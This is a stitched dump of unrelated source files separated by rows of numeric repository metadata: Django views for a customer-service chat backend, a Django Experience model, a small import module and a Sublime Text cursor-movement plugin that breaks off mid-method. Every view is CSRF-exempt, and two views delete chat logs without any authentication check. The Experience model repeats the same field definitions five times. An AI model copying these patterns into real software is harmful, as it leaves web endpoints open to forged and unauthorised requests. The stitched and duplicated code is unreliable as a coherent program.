if serializer.is_valid():
serializer.save()
return HttpResponse(json_receive['vid'], status=200)
return HttpResponse("ERROR, invalid data in serializer.", status=200)
@csrf_exempt
def customerservice_forget_password_save_data(request):
if request.method == 'POST':
# CustomerService: email newpassword vid
json_receive = JSONParser().parse(request)
is_correct, error_message = customerservice_forget_password_save_data_check(json_receive)
if is_correct == 0:
return HttpResponse(error_message, status=200)
instance = CustomerService.objects.get(email=json_receive['email'])
sha512_new_final_password = cs_generate_password(json_receive['email'], json_receive['newpassword'])
json_receive['password'] = sha512_new_final_password
json_receive['vid'] = cs_generate_vid(json_receive['email'])
json_receive['vid_createtime'] = timezone.now()
serializer = CustomerServiceSerializer(instance, data=json_receive)
if serializer.is_valid():
serializer.save()
return HttpResponse('OK', status=200)
return HttpResponse("ERROR, invalid data in serializer.", status=200)
@csrf_exempt
def customerservice_show_user_status(request):
if request.method == 'POST':
# no json
is_correct, error_message = customerservice_show_user_status_check(request)
if is_correct == 0:
return HttpResponse(error_message, status=200)
data_email = request.session['c_email']
instance = CustomerService.objects.get(email=data_email)
instance_admin = instance.enterprise
json_send = {'email': instance.email, 'nickname': instance.nickname, 'admin_nickname': instance_admin.nickname}
return JsonResponse(json_send, status=200)
@csrf_exempt
def customerservice_update_connection_num(request):
if request.method == 'POST':
# CustomerService: connection_num
json_receive = JSONParser().parse(request)
is_correct, error_message = customerservice_update_connection_num_check(json_receive, request)
if is_correct == 0:
return HttpResponse(error_message, status=200)
data_email = request.session['c_email']
instance = CustomerService.objects.get(email=data_email)
instance.connection_num = json_receive['connection_num']
instance.save()
return HttpResponse('OK', status=200)
@csrf_exempt
def customerservice_update_login_status(request):
if request.method == 'POST':
# CustomerService: login_status
json_receive = JSONParser().parse(request)
is_correct, error_message = customerservice_update_login_status_check(json_receive, request)
if is_correct == 0:
return HttpResponse(error_message, status=200)
data_email = request.session['c_email']
instance = CustomerService.objects.get(email=data_email)
instance.is_online = json_receive['login_status']
instance.save()
return HttpResponse('OK', status=200)
@csrf_exempt
def customerservice_setrobotinfo_create(request):
if request.method == 'POST':
# RobotInfo: question answer keyword weight
json_receive = JSONParser().parse(request)
is_correct, error_message = customerservice_setrobotinfo_create_check(json_receive, request)
if is_correct == 0:
return HttpResponse(error_message, status=200)
data_email = request.session['c_email']
instance_customerservice = CustomerService.objects.get(email=data_email)
json_receive['enterprise'] = instance_customerservice.enterprise.id
serializer = RobotInfoSerializer(data=json_receive)
if serializer.is_valid():
serializer.save()
robot_add_keyword(json_receive['keyword'])
return HttpResponse('OK', status=200)
return HttpResponse("ERROR, invalid data in serializer.", status=200)
@csrf_exempt
def customerservice_setrobotinfo_delete(request):
if request.method == 'POST':
# RobotInfo: question
json_receive = JSONParser().parse(request)
is_correct, error_message = customerservice_setrobotinfo_delete_check(json_receive, request)
if is_correct == 0:
return HttpResponse(error_message, status=200)
data_email = request.session['c_email']
instance_customerservice = CustomerService.objects.get(email=data_email)
data_enterprise = instance_customerservice.enterprise
instance_robotinfo = RobotInfo.objects.filter(enterprise=data_enterprise, question=json_receive['question'])
instance_robotinfo.delete()
return HttpResponse('OK', status=200)
@csrf_exempt
def customerservice_setrobotinfo_show(request):
if request.method == 'POST':
# no json
is_correct, error_message = customerservice_setrobotinfo_show_check(request)
if is_correct == 0:
return HttpResponse(error_message, status=200)
data_email = request.session['c_email']
instance_customerservice = CustomerService.objects.get(email=data_email)
data_enterprise = instance_customerservice.enterprise
instance_alldata = RobotInfo.objects.filter(enterprise=data_enterprise)
json_send = list()
for i in instance_alldata:
json_send.append({'question': i.question, 'answer': i.answer, 'keyword': i.keyword, 'weight': i.weight})
return JsonResponse(json_send, safe=False, status=200)
@csrf_exempt
def customerservice_displayrobotreply_show(request):
if request.method == 'POST':
# CustomerService: nickname, customer_input
json_receive = JSONParser().parse(request)
is_correct, error_message = customerservice_displayrobotreply_show_check(json_receive)
if is_correct == 0:
return HttpResponse(error_message, status=200)
instance_admin = Admin.objects.get(nickname=json_receive['nickname'])
admin_id = instance_admin.id
answer = robot_return_answer(admin_id, json_receive['customer_input'])
return HttpResponse(answer, status=200)
@csrf_exempt
def customerservice_logout(request):
if request.method == 'POST':
# no json
is_correct, error_message = customerservice_logout_check(request)
if is_correct == 0:
return HttpResponse(error_message, status=200)
instance = CustomerService.objects.get(email=request.session['c_email'])
instance.is_online = False
instance.save()
del request.session['c_email']
return HttpResponse('OK', status=200)
@csrf_exempt
def chattinglog_send_message(request):
if request.method == 'POST':
# client_id service_id content is_client
json_receive = JSONParser().parse(request)
serializer = ChattingLogSerializer(data=json_receive)
if serializer.is_valid():
serializer.save()
return JsonResponse(serializer.data, status=200)
return JsonResponse(serializer.errors, status=201)
@csrf_exempt
def chattinglog_delete_record(request):
if request.method == 'POST':
chattinglogs = ChattingLog.objects.all()
if chattinglogs.exists():
chattinglogs.delete()
return HttpResponse('Clear', status=200)
else:
return HttpResponse('No data to be Clear.', status=201)
@csrf_exempt
def chattinglog_delete_record_ontime(request):
if request.method == 'POST':
# now = timezone.now()
# end_date = datetime(now.year, now.month, now.day, 0, 0)
end_date = timezone.now()
start_date = end_date + timedelta(days=-100)
chattinglogs = ChattingLog.objects.exclude(time__range=(start_date, end_date))
if chattinglogs.exists():
chattinglogs.delete()
return HttpResponse('Clear', status=200)
else:
return HttpResponse('No data to be Clear.', status=201)
@csrf_exempt
def chattinglog_get_cs_id(request):
if request.method == 'POST':
# nickname!!!!!
json_receive = JSONParser().parse(request)
instance = CustomerService.objects.filter(nickname=json_receive['nickname'])
if instance.exists() == False:
return HttpResponse('robot',status=200)
else:
return HttpResponse(instance[0].id,status=200)
@csrf_exempt
def bigimagelog_send_image(request):
if request.method == 'POST':
# bigimagelog: client_id service_id image is_client label
json_receive = JSONParser().parse(request)
json_receive['time'] = timezone.now()
ext_position1 = json_receive['image'].index('data:image/')
ext_position2 = json_receive['image'].index(';base64,')
json_receive['extention'] = json_receive['image'][ext_position1+11:ext_position2]
serializer = BigImageLogSerializer(data=json_receive)
if serializer.is_valid():
serializer.save()
return HttpResponse('OK', status=200)
return HttpResponse("ERROR, invalid data in serializer.", status=200)
@csrf_exempt
def bigimagelog_show_single_history(request):
if request.method == 'POST':
# bigimagelog: client_id service_id label
json_receive = JSONParser().parse(request)
instances = BigImageLog.objects.filter(client_id=json_receive['client_id'], service_id=json_receive['service_id'], label=json_receive['label'])
if instances.exists():
f = open('./media/'+instances[0].image.url,'rb')
ls_f = 'data:image/' + instances[0].extention + ';base64,' + base64.b64encode(f.read()).decode('utf-8')
f.close()
return HttpResponse(ls_f, status=200)
return HttpResponse('ERROR, no history.', status=200)
@csrf_exempt
def smallimagelog_send_image(request):
if request.method == 'POST':
# smallimagelog: client_id service_id image is_client label
json_receive = JSONParser().parse(request)
json_receive['time'] = timezone.now()
ext_position1 = json_receive['image'].index('data:image/')
ext_position2 = json_receive['image'].index(';base64,')
json_receive['extention'] = json_receive['image'][ext_position1+11:ext_position2]
serializer = SmallImageLogSerializer(data=json_receive)
if serializer.is_valid():
serializer.save()
return HttpResponse('OK', status=200)
return HttpResponse("ERROR, invalid data in serializer.", status=200)
@csrf_exempt
def log_show_history(request):
if request.method == 'POST':
# client_id service_id
json_receive = JSONParser().parse(request)
instance_customerservice = CustomerService.objects.get(id = json_receive['service_id'])
instance_enterprise = instance_customerservice.enterprise
queryset_customerservice = CustomerService.objects.filter(enterprise = instance_enterprise.id)
cs_list = list()
for i in queryset_customerservice:
cs_list.append(i.id)
queryset_image = SmallImageLog.objects.none()
queryset_chat = ChattingLog.objects.none()
for i in cs_list:
queryset_image = queryset_image | SmallImageLog.objects.filter(client_id=json_receive['client_id'], service_id=i)
queryset_chat = queryset_chat | ChattingLog.objects.filter(client_id=json_receive['client_id'], service_id=i)
instance_image = queryset_image.distinct().order_by('time')
instance_chat = queryset_chat.distinct().order_by('time')
len_image = len(instance_image)
pointer_image = 0
len_chat = len(instance_chat)
pointer_chat = 0
json_send = list()
pointer_image, pointer_chat = log_show_history_while_snippet(json_send, instance_image, instance_chat, len_image, len_chat, pointer_image, pointer_chat)
log_show_history_if_snippet(json_send, instance_image, instance_chat, len_image, len_chat, pointer_image, pointer_chat)
return JsonResponse(json_send, safe=False, status=200)
@csrf_exempt
def internal_reset_basic_robot(request):
if request.method == 'GET':
robot_basic_read()
return HttpResponse('Done', status=200)
@csrf_exempt
def customer_check_info(request):
if request.method == 'POST':
# customer_info: enterprise_id, customer_id, cusotmer_name, hash_result
json_receive = JSONParser().parse(request)
is_correct, error_message = customer_check_info_check(json_receive)
if is_correct == 0:
return HttpResponse(error_message, status=200)
info_enterprise_id = json_receive['enterprise_id']
info_customer_id = json_receive['customer_id']
info_cusotmer_name = json_receive['cusotmer_name']
instance = Admin.objects.get(nickname=info_enterprise_id)
hash_result = customer_generate_hash_result(info_enterprise_id, info_customer_id, info_cusotmer_name, instance.communication_key)
if hash_result == json_receive['hash_result']:
return HttpResponse('True', status=200)
else:
return HttpResponse('False', status=200)
@csrf_exempt
def customer_display_customerinfopropertyname(request):
if request.method == 'POST':
# enterprise_id
json_receive = JSONParser().parse(request)
is_correct, error_message = customer_display_customerinfopropertyname_check(json_receive)
if is_correct == 0:
return HttpResponse(error_message, status=200)
instance_admin = Admin.objects.get(nickname=json_receive['enterprise_id'])
instance_displayinfo = EnterpriseDisplayInfo.objects.filter(enterprise=instance_admin.id)
json_send = list()
for i in instance_displayinfo:
json_send.append({'name': i.name})
return JsonResponse(json_send, safe=False, status=200)
| 44.992177 | 274 | 0.695876 | 3,933 | 34,509 | 5.829647 | 0.059242 | 0.102189 | 0.056176 | 0.04126 | 0.83108 | 0.801422 | 0.767664 | 0.736305 | 0.71899 | 0.69474 | 0 | 0.018881 | 0.201918 | 34,509 | 766 | 275 | 45.050914 | 0.813623 | 0.034368 | 0 | 0.654485 | 0 | 0 | 0.089849 | 0.002254 | 0.004983 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0.074751 | 0.021595 | 0 | 0.265781 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
2e560bfe89ca42fd6ca07398ce2d5881e5b1c914 | 3,253 | py | Python | Reto_Back_Adrian_Velazquez/ExpLab/models.py | Velazquezadrian/hackthatstartup | e8845fb4e0f22232c4a143e2c76cc20e1087a01d | [
"MIT"
] | null | null | null | Reto_Back_Adrian_Velazquez/ExpLab/models.py | Velazquezadrian/hackthatstartup | e8845fb4e0f22232c4a143e2c76cc20e1087a01d | [
"MIT"
] | null | null | null | Reto_Back_Adrian_Velazquez/ExpLab/models.py | Velazquezadrian/hackthatstartup | e8845fb4e0f22232c4a143e2c76cc20e1087a01d | [
"MIT"
] | null | null | null | from django.db import models
class Employee(models.Model):
first_name = models.CharField(max_length=100)
last_name = models.CharField(max_length=100)
email_address = models.EmailField(max_length=100)
phone_num = models.CharField(max_length=15)
years_of_experience = models.IntegerField(default=0)
username = models.CharField(max_length=50, unique=True, primary_key=True)
class Experience(models.Model):
employee = models.ForeignKey(Employee, on_delete=models.CASCADE)
organization_one = models.CharField(max_length=100, null=True, blank=True)
job_position_one = models.CharField(max_length=100, null=True, blank=True)
description = models.TextField(max_length=500, null=True, blank=True)
year = models.PositiveIntegerField(default=0)
departure = models.CharField(max_length=100, null=True, blank=True, verbose_name='Motivo de la salida')
organization_one = models.CharField(max_length=100, null=True, blank=True, verbose_name='Empresa')
job_position_one = models.CharField(max_length=100, null=True, blank=True, verbose_name='Posicion')
description = models.TextField(max_length=500, null=True, blank=True, verbose_name='Descripcion del puesto')
year = models.PositiveIntegerField(default=0)
departure = models.CharField(max_length=100, null=True, blank=True, verbose_name='Motivo de la salida')
organization_one = models.CharField(max_length=100, null=True, blank=True, verbose_name='Empresa')
job_position_one = models.CharField(max_length=100, null=True, blank=True, verbose_name='Posision')
description = models.TextField(max_length=500, null=True, blank=True, verbose_name='Descripcion del puesto')
year = models.PositiveIntegerField(default=0)
departure = models.CharField(max_length=100, null=True, blank=True, verbose_name='Motivo de la salida')
organization_one = models.CharField(max_length=100, null=True, blank=True, verbose_name='Empresa')
job_position_one = models.CharField(max_length=100, null=True, blank=True, verbose_name='Posision')
description = models.TextField(max_length=500, null=True, blank=True, verbose_name='Descripcion del puesto')
year = models.PositiveIntegerField(default=0)
departure = models.CharField(max_length=100, null=True, blank=True, verbose_name='Motivo de la salida')
organization_one = models.CharField(max_length=100, null=True, blank=True, verbose_name='Empresa')
job_position_one = models.CharField(max_length=100, null=True, blank=True, verbose_name='Posision')
description = models.TextField(max_length=500, null=True, blank=True, verbose_name='Descripcion del puesto')
year = models.PositiveIntegerField(default=0)
departure = models.CharField(max_length=100, null=True, blank=True, verbose_name='Motivo de la salida')
organization_one = models.CharField(max_length=100, null=True, blank=True, verbose_name='Empresa')
job_position_one = models.CharField(max_length=100, null=True, blank=True, verbose_name='Posision')
description = models.TextField(max_length=500, null=True, blank=True, verbose_name='Descripcion del puesto')
year = models.PositiveIntegerField(default=0)
departure = models.CharField(max_length=100, null=True, blank=True, verbose_name='Motivo de la salida') | 65.06 | 111 | 0.777436 | 446 | 3,253 | 5.5 | 0.134529 | 0.1064 | 0.127191 | 0.166327 | 0.869955 | 0.869955 | 0.84468 | 0.84468 | 0.84468 | 0.84468 | 0 | 0.031626 | 0.105749 | 3,253 | 50 | 112 | 65.06 | 0.811619 | 0 | 0 | 0.65 | 0 | 0 | 0.091887 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.025 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
cf742a6b150a249b4b9cabcfe786a2893da1b73e | 118 | py | Python | phcovid/data_extractor/__init__.py | kvdomingo/covid19-ph-web | 06cc83bfcbc1db925be6dede7fd051ab39056329 | [
"MIT"
] | 14 | 2020-03-27T02:48:50.000Z | 2021-09-10T16:43:42.000Z | phcovid/data_extractor/__init__.py | kvdomingo/covid19-ph-web | 06cc83bfcbc1db925be6dede7fd051ab39056329 | [
"MIT"
] | 31 | 2020-03-25T06:17:33.000Z | 2020-05-04T05:58:36.000Z | phcovid/data_extractor/__init__.py | kvdomingo/covid19-ph-web | 06cc83bfcbc1db925be6dede7fd051ab39056329 | [
"MIT"
] | 5 | 2020-03-23T14:04:29.000Z | 2020-07-24T09:51:23.000Z | from .arcgis import extract_arcgis_data # noqa: F401
from .dsph_gsheet import extract_dsph_gsheet_data # noqa: F401
| 39.333333 | 63 | 0.813559 | 18 | 118 | 5 | 0.5 | 0.288889 | 0.266667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.058824 | 0.135593 | 118 | 2 | 64 | 59 | 0.823529 | 0.177966 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
cf824a806d5d7f542661791207daf2ac0b02180b | 33,058 | py | Python | KeyboardNavigation.py | robertcollier4/keyboardmovementSublime | d67e0f3d3c0d395d0152b1a41ba216c5f3f6ebb1 | [
"Unlicense"
] | 4 | 2020-10-22T13:17:43.000Z | 2021-12-24T03:11:00.000Z | KeyboardNavigation.py | robertcollier4/keyboardmovementSublime | d67e0f3d3c0d395d0152b1a41ba216c5f3f6ebb1 | [
"Unlicense"
] | 2 | 2019-04-29T08:34:30.000Z | 2019-04-29T15:21:45.000Z | KeyboardNavigation.py | robertcollier4/keyboardmovementSublime | d67e0f3d3c0d395d0152b1a41ba216c5f3f6ebb1 | [
"Unlicense"
] | 1 | 2021-08-18T02:42:55.000Z | 2021-08-18T02:42:55.000Z | import sublime, sublime_plugin
import string
#---------------------------------------------------------------
class MoveToBegOfContigBoundaryCommand(sublime_plugin.TextCommand):
def run(self, edit, forward):
view = self.view
# 32=space 9=tab 10=newline 13=carriagereturn
whiteChars = (chr(32), chr(9), chr(10), chr(13))
#spaceChars = (chr(32), chr(9))
spaceChars = (chr(32), chr(9))
newlineChars = (chr(10), chr(13))
newlineChar = chr(10)
# newlineChars = (chr(10), chr(13))
RegionsSelOld = list(view.sel())
view.sel().clear()
for ThisRegion in RegionsSelOld:
# for ThisRegion in view.sel():
if(forward): #forward
boolAtNewline = False
ThisRegionBegin = ThisRegion.a
ThisRegionEnd = ThisRegion.b
if( (view.substr(ThisRegionEnd) in newlineChars) and (ThisRegionEnd < view.size()) ):
ThisRegionEnd += 1
else:
while( ((view.substr(ThisRegionEnd) not in spaceChars) or (view.substr(ThisRegionEnd) in newlineChars)) and (ThisRegionEnd < view.size()) ):
if(view.substr(ThisRegionEnd) == newlineChar):
boolAtNewline = True
ThisRegionEnd += 1
break
ThisRegionEnd += 1
while( ((view.substr(ThisRegionEnd) in spaceChars) or boolAtNewline) and (ThisRegionEnd < view.size()) ):
if(boolAtNewline):
break
ThisRegionEnd += 1
if( (ThisRegionEnd < view.size()) and (ThisRegionEnd == ThisRegion.b) ):
ThisRegionEnd += 1
# view.sel().clear()
view.sel().add(sublime.Region(ThisRegionEnd))
view.show(ThisRegionEnd+1)
else: #backward
ThisRegionBegin = ThisRegion.a
ThisRegionEnd = ThisRegion.b-1
if( (view.substr(ThisRegionEnd) in newlineChars) and (ThisRegionEnd >= 0) ):
ThisRegionEnd -= 1
while( (view.substr(ThisRegionEnd) in spaceChars) and (ThisRegionEnd >= 0) ):
ThisRegionEnd -= 1
while( (view.substr(ThisRegionEnd) not in whiteChars) and (ThisRegionEnd >= 0) ):
ThisRegionEnd -= 1
if( (ThisRegionEnd >= 0) and (ThisRegionEnd+1 == ThisRegion.b) ):
ThisRegionEnd -= 1
# view.sel().clear()
view.sel().add(sublime.Region(ThisRegionEnd+1))
view.show(ThisRegionEnd)
# https://ee.hawaii.edu/~tep/EE160/Book/chap4/subsection2.1.1.1.html
class MoveToBegOfSubwordBoundaryCommand(sublime_plugin.TextCommand):
def run(self, edit, forward):
view = self.view
# 32=space 9=tab 10=newline 13=carriagereturn 34=" 35=# 36=$ 37=% 38=& 39=' 61== 64=@ 58=: 63=? 46=. 44=, 43=+ 95=_ 45=- 60=< 62=> 40=( 41=) 91=[ 93=] 123={ 125=} 124=| 47=/ 92=\
subwordDelims = [chr(32), chr(9), chr(10), chr(13), chr(34), chr(35), chr(36), chr(37), chr(38), chr(39), chr(61), chr(64), chr(58), chr(63), chr(46), chr(44), chr(43), chr(95), chr(45), chr(60), chr(62), chr(40), chr(41), chr(91), chr(93), chr(123), chr(125), chr(124), chr(47), chr(92)]
for ThisRegion in view.sel():
if(forward): #forward
ThisRegionBegin = ThisRegion.a
ThisRegionEnd = ThisRegion.b
while( (view.substr(ThisRegionEnd) not in subwordDelims) and (ThisRegionEnd < view.size()) ):
ThisRegionEnd += 1
if( (ThisRegionEnd < view.size()) and (ThisRegionEnd == ThisRegion.b) ):
ThisRegionEnd += 1
view.sel().clear()
view.sel().add(sublime.Region(ThisRegionEnd))
view.show(ThisRegionEnd+1)
else: #backward
ThisRegionBegin = ThisRegion.a
ThisRegionEnd = ThisRegion.b-1
while( (view.substr(ThisRegionEnd) not in subwordDelims) and (ThisRegionEnd >= 0) ):
ThisRegionEnd -= 1
if( (ThisRegionEnd >= 0) and (ThisRegionEnd+1 == ThisRegion.b) ):
ThisRegionEnd -= 1
view.sel().clear()
view.sel().add(sublime.Region(ThisRegionEnd+1))
view.show(ThisRegionEnd)
#---------------------------------------------------------------
class SelectToBegOfContigBoundaryCommand(sublime_plugin.TextCommand):
def run(self, edit, forward):
view = self.view
# 32=space 9=tab 10=newline 13=carriagereturn
whiteChars = (chr(32), chr(9), chr(10), chr(13))
spaceChars = (chr(32), chr(9))
newlineChars = (chr(10), chr(13))
newlineChar = chr(10)
for ThisRegion in view.sel():
if(ThisRegion.a == ThisRegion.b):
if(forward): #forward
boolAtNewline = False
ThisRegionBegin = ThisRegion.a
ThisRegionEnd = ThisRegion.b
if( (view.substr(ThisRegionEnd) in newlineChars) and (ThisRegionEnd < view.size()) ):
ThisRegionEnd += 1
else:
while( ((view.substr(ThisRegionEnd) not in spaceChars) or (view.substr(ThisRegionEnd) in newlineChars)) and (ThisRegionEnd < view.size()) ):
if(view.substr(ThisRegionEnd) == newlineChar):
boolAtNewline = True
ThisRegionEnd += 1
break
ThisRegionEnd += 1
while( ((view.substr(ThisRegionEnd) in spaceChars) or boolAtNewline) and (ThisRegionEnd < view.size()) ):
if(boolAtNewline):
break
ThisRegionEnd += 1
if( (ThisRegionEnd < view.size()) and (ThisRegionEnd == ThisRegion.b) ):
ThisRegionEnd += 1
view.sel().clear()
view.sel().add(sublime.Region(ThisRegionBegin, ThisRegionEnd))
view.show(ThisRegionEnd+1)
else: #backward
ThisRegionBegin = ThisRegion.a
ThisRegionEnd = ThisRegion.b-1
if( (view.substr(ThisRegionEnd) in newlineChars) and (ThisRegionEnd >= 0) ):
ThisRegionEnd -= 1
while( (view.substr(ThisRegionEnd) in spaceChars) and (ThisRegionEnd >= 0) ):
ThisRegionEnd -= 1
while( (view.substr(ThisRegionEnd) not in whiteChars) and (ThisRegionEnd >= 0) ):
ThisRegionEnd -= 1
if( (ThisRegionEnd >= 0) and (ThisRegionEnd+1 == ThisRegion.b) ):
ThisRegionEnd -= 1
view.sel().clear()
view.sel().add(sublime.Region(ThisRegionBegin, ThisRegionEnd+1))
view.show(ThisRegionEnd)
elif(ThisRegion.a < ThisRegion.b):
if(forward): #forward
boolAtNewline = False
ThisRegionBegin = ThisRegion.a
ThisRegionEnd = ThisRegion.b
if( (view.substr(ThisRegionEnd) in newlineChars) and (ThisRegionEnd < view.size()) ):
ThisRegionEnd += 1
else:
while( ((view.substr(ThisRegionEnd) not in spaceChars) or (view.substr(ThisRegionEnd) in newlineChars)) and (ThisRegionEnd < view.size()) ):
if(view.substr(ThisRegionEnd) == newlineChar):
boolAtNewline = True
ThisRegionEnd += 1
break
ThisRegionEnd += 1
while( ((view.substr(ThisRegionEnd) in spaceChars) or boolAtNewline) and (ThisRegionEnd < view.size()) ):
if(boolAtNewline):
break
ThisRegionEnd += 1
if( (ThisRegionEnd < view.size()) and (ThisRegionEnd == ThisRegion.b) ):
ThisRegionEnd += 1
view.sel().clear()
view.sel().add(sublime.Region(ThisRegionBegin, ThisRegionEnd))
view.show(ThisRegionEnd+1)
else: #backward
ThisRegionBegin = ThisRegion.a
ThisRegionEnd = ThisRegion.b-1
while( (view.substr(ThisRegionEnd) in newlineChars) and (ThisRegionEnd > ThisRegionBegin-1) and (ThisRegionEnd >= 0)):
ThisRegionEnd -= 1
while( (view.substr(ThisRegionEnd) in spaceChars) and (ThisRegionEnd > ThisRegionBegin-1) and (ThisRegionEnd >= 0) ):
ThisRegionEnd -= 1
while( (view.substr(ThisRegionEnd) not in whiteChars) and (ThisRegionEnd > ThisRegionBegin-1) and (ThisRegionEnd >= 0)):
ThisRegionEnd -= 1
if((ThisRegionEnd >= 0) and (ThisRegionEnd+1 == ThisRegion.b)):
ThisRegionEnd -= 1
view.sel().clear()
view.sel().add(sublime.Region(ThisRegionBegin, ThisRegionEnd+1))
view.show(ThisRegionEnd)
else: # ThisRegion.a > ThisRegion.b
if(forward): #forward
boolAtNewline = False
ThisRegionBegin = ThisRegion.a
ThisRegionEnd = ThisRegion.b
if( (view.substr(ThisRegionEnd) in newlineChars) and (ThisRegionEnd < view.size()) ):
ThisRegionEnd += 1
else:
while( ((view.substr(ThisRegionEnd) not in spaceChars) or (view.substr(ThisRegionEnd) in newlineChars)) and (ThisRegionEnd < ThisRegionBegin) and (ThisRegionEnd < view.size())):
if(view.substr(ThisRegionEnd) == newlineChar):
boolAtNewline = True
ThisRegionEnd += 1
break
ThisRegionEnd += 1
while( ((view.substr(ThisRegionEnd) in spaceChars) or boolAtNewline) and (ThisRegionEnd < ThisRegionBegin) and (ThisRegionEnd < view.size())):
if(boolAtNewline):
break
ThisRegionEnd += 1
if((ThisRegionEnd < view.size()) and (ThisRegionEnd == ThisRegion.b)):
ThisRegionEnd += 1
view.sel().clear()
view.sel().add(sublime.Region(ThisRegionBegin, ThisRegionEnd))
view.show(ThisRegionEnd+1)
else: #backward
ThisRegionBegin = ThisRegion.a
ThisRegionEnd = ThisRegion.b-1
if( (view.substr(ThisRegionEnd) in newlineChars) and (ThisRegionEnd >= 0) ):
ThisRegionEnd -= 1
while( (view.substr(ThisRegionEnd) in spaceChars) and (ThisRegionEnd >= 0)):
ThisRegionEnd -= 1
while( (view.substr(ThisRegionEnd) not in whiteChars) and (ThisRegionEnd >= 0)):
ThisRegionEnd -= 1
if((ThisRegionEnd >= 0) and (ThisRegionEnd+1 == ThisRegion.b)):
ThisRegionEnd -= 1
view.sel().clear()
view.sel().add(sublime.Region(ThisRegionBegin, ThisRegionEnd+1))
view.show(ThisRegionEnd)
class SelectToBegOfSubwordBoundaryCommand(sublime_plugin.TextCommand):
def run(self, edit, forward):
view = self.view
# 32=space 9=tab 10=newline 13=carriagereturn 34=" 35=# 36=$ 37=% 38=& 39=' 61== 64=@ 58=: 63=? 46=. 44=, 43=+ 95=_ 45=- 60=< 62=> 40=( 41=) 91=[ 93=] 123={ 125=} 124=| 47=/ 92=\
subwordDelims = [chr(32), chr(9), chr(10), chr(13), chr(34), chr(35), chr(36), chr(37), chr(38), chr(39), chr(61), chr(64), chr(58), chr(63), chr(46), chr(44), chr(43), chr(95), chr(45), chr(60), chr(62), chr(40), chr(41), chr(91), chr(93), chr(123), chr(125), chr(124), chr(47), chr(92)]
for ThisRegion in view.sel():
if(ThisRegion.a == ThisRegion.b):
if(forward): #forward
ThisRegionBegin = ThisRegion.a
ThisRegionEnd = ThisRegion.b
while( (view.substr(ThisRegionEnd) not in subwordDelims) and (ThisRegionEnd < view.size()) ):
ThisRegionEnd += 1
if((ThisRegionEnd < view.size()) and (ThisRegionEnd == ThisRegionBegin)):
ThisRegionEnd += 1
view.sel().clear()
view.sel().add(sublime.Region(ThisRegionBegin, ThisRegionEnd))
view.show(ThisRegionEnd+1)
else: #backward
ThisRegionBegin = ThisRegion.a
ThisRegionEnd = ThisRegion.b-1
while( (view.substr(ThisRegionEnd) not in subwordDelims) and (ThisRegionEnd >= 0) ):
ThisRegionEnd -= 1
if((ThisRegionEnd >= 0) and (ThisRegionEnd+1 == ThisRegionBegin)):
ThisRegionEnd -= 1
view.sel().clear()
view.sel().add(sublime.Region(ThisRegionBegin, ThisRegionEnd+1))
view.show(ThisRegionEnd)
elif(ThisRegion.a < ThisRegion.b):
if(forward): #forward
ThisRegionBegin = ThisRegion.a
ThisRegionEnd = ThisRegion.b
while( (view.substr(ThisRegionEnd) not in subwordDelims) and (ThisRegionEnd < view.size()) ):
ThisRegionEnd += 1
if((ThisRegionEnd < view.size()) and (ThisRegionEnd == ThisRegion.b)):
ThisRegionEnd += 1
view.sel().clear()
view.sel().add(sublime.Region(ThisRegionBegin, ThisRegionEnd))
view.show(ThisRegionEnd+1)
else: #backward
ThisRegionBegin = ThisRegion.a
ThisRegionEnd = ThisRegion.b-1
while( (view.substr(ThisRegionEnd) not in subwordDelims) and (ThisRegionEnd >= 0) ):
ThisRegionEnd -= 1
if((ThisRegionEnd >= 0) and (ThisRegionEnd+1 == ThisRegion.b)):
ThisRegionEnd -= 1
view.sel().clear()
view.sel().add(sublime.Region(ThisRegionBegin, ThisRegionEnd+1))
view.show(ThisRegionEnd)
else: # ThisRegion.a > ThisRegion.b
if(forward): #forward
ThisRegionBegin = ThisRegion.a
ThisRegionEnd = ThisRegion.b
while( (view.substr(ThisRegionEnd) not in subwordDelims) and (ThisRegionEnd < view.size()) ):
ThisRegionEnd += 1
if((ThisRegionEnd < view.size()) and (ThisRegionEnd == ThisRegion.b)):
ThisRegionEnd += 1
view.sel().clear()
view.sel().add(sublime.Region(ThisRegionBegin, ThisRegionEnd))
view.show(ThisRegionEnd+1)
else: #backward
ThisRegionBegin = ThisRegion.a
ThisRegionEnd = ThisRegion.b-1
while( (view.substr(ThisRegionEnd) not in subwordDelims) and (ThisRegionEnd >= 0) ):
ThisRegionEnd -= 1
if((ThisRegionEnd >= 0) and (ThisRegionEnd+1 == ThisRegion.b)):
ThisRegionEnd -= 1
view.sel().clear()
view.sel().add(sublime.Region(ThisRegionBegin, ThisRegionEnd+1))
view.show(ThisRegionEnd)
class SelectToKnLinelimitCommand(sublime_plugin.TextCommand):
def run(self, edit, forward):
view = self.view
for ThisRegion in view.sel():
if(forward): #forward
ThisRegionEnd = view.line(ThisRegion).end()
view.sel().clear()
view.sel().add(sublime.Region(ThisRegion.a, ThisRegionEnd))
view.show(ThisRegionEnd)
else: #backward
ThisRegionEnd = view.line(ThisRegion).begin()
view.sel().clear()
view.sel().add(sublime.Region(ThisRegion.a, ThisRegionEnd))
view.show(ThisRegionEnd)
#---------------------------------------------------------------
class ExpandSelectionToDelimsCommand(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
